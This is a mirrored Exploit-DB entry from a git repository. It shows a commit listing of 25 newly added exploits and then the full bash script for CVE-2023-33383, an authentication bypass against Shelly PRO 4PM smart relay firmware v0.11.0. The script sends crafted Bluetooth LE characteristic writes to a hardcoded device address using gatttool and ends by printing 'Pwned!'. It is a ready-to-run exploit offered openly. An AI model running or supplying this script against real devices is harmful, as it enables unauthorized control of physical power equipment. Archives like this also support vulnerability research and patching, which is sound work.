bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/51657.txt
Exploit-DB 010e679abe DB: 2023-08-05 
25 changes to exploits/shellcodes/ghdb

ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)

Shelly PRO 4PM v0.11.0 - Authentication Bypass

Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)

Academy LMS 6.0 - Reflected XSS

Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting

Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload

JLex GuestBook 1.6.4 - Reflected XSS

Joomla JLex Review 6.0.1 - Reflected XSS

News Portal v4.0 - SQL Injection (Unauthorized)

PHPJabbers Cleaning Business 1.0 - Reflected XSS

PHPJabbers Night Club Booking 1.0 - Reflected XSS
PHPJabbers Rental Property Booking 2.0 - Reflected XSS
PHPJabbers Service Booking Script 1.0 - Reflected XSS
PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS

PHPJabbers Taxi Booking 2.0 - Reflected XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS

Webutler v3.2 - Remote Code Execution (RCE)
WordPress adivaha Travel Plugin 2.3 - Reflected XSS
WordPress adivaha Travel Plugin 2.3 - SQL Injection
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR

WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution

WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS

Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
2023-08-05 00:16:32 +00:00

68 lines
No EOL
2.1 KiB
Bash
Raw Blame History

#!/bin/bash
# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
# Google Dork: NA
# Date: 2nd August 2023
# Exploit Author: The Security Team [exploitsecurity.io]
# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
# Vendor Homepage: https://www.shelly.com/
# Software Link: NA
# Version: Firmware v0.11.0 (REQUIRED)
# Tested on: MacOS/Linux
# CVE : CVE-2023-33383
IFS=
failed=$false
RED="\e[31m"
GREEN="\e[92m"
WHITE="\e[97m"
ENDCOLOR="\e[0m"
substring="Connection refused"
banner()
{
clear
echo -e "${GREEN}[+]*********************************************************[+]"
echo -e "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |"
echo -e "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |"
echo -e "${GREEN}| CVE: CVE-2023-33383 |"
echo -e "${GREEN}[+]*********************************************************[+]"
echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
}
banner
read -s -n 1 key
if [ "$key" = "x" ]; then
exit 0;
elif [ "$key" = "" ]; then
gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
if [ -z "$gattout" ]; then
echo -e "${RED}Connection timed out${ENDCOLOR}"
exit 0;
else
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
sleep 1
if [ $? -eq 1 ]; then
$failed=$true
exit 0;
fi
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
sleep 1
if [ $? -eq 1 ]; then
$failed=$true
echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
exit 0;
else
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
sleep 1
for i in {1..5}
do
echo -ne "${GREEN}."
sleep 1
done
echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
fi
fi
fi
Reference in a new issue View git blame Copy permalink